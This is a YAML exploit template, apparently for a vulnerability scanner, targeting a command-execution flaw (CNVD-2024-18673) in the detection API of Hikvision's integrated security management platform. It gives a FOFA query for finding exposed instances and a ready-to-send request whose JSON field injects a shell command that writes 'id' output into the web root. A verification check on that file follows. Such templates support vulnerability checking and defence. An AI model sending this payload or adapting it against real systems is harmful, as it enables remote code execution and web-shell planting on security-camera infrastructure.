product: 海康威视综合安防管理平台
vName: 海康威视综合安防管理平台 detection接口RCE
type: 命令执行
vID:
  - CNVD-2024-18673
level: 3
vDesc: 海康威视综合安防系统 detection接口存在RCE，通过命令可写入shell
version: ''
note: ''
search:
  FOFA: app="HIKVISION-综合安防管理平台" || app="HIKVISION-iSecure-Center"
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /center/api/installation/detection
      header:
        Content-Type: application/json;charset=UTF-8
      json:
        machines:
          id: $(find /|grep chunk-common.34c924fe.js|while read f;do sh -c id >$(dirname $f)/52e039302a62d077.js;done)
        operate: ''
        type: environment
    verify:
      path: /portal/ui/static/js/52e039302a62d077.js
      logic: and
      check:
        - status: 200
          body:
            value:
              - uid=
            logic: and